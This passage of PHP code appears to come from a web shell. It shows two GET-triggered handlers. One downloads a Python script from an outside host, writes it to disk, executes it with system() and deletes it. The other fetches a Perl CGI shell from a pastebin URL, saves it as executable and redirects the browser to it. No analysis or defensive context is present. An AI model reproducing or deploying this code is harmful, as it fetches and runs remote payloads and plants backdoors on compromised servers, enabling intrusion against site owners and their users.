3143. }
3144. if($_GET['symbolic']=="link"){
3145. $get = file_get_contents('http://x-x-x.yn.tl/py');
3146. $bwt = fopen('symlink.py', 'w');
3147. fwrite($bwt,$get);
3148. fclose($bwt);
3149. system('python symlink.py');unlink('symlink.py');
3150. echo'<meta http-equiv="Refresh" content= "0; url=sl">';
3151. }
3152. if($_GET['perl']=="shell"){
3153. $get = file_get_contents('http://pastebin.com/raw/5trLjPyh');
3154. $bwt = fopen('cgi.pl', 'w');
3155. fwrite($bwt,$get);
3156. fclose($bwt);
3157. chmod('cgi.pl',0755);
3158. echo'<meta http-equiv="Refresh" content= "0; url=cgi.pl">';
3159. }
3160. ?>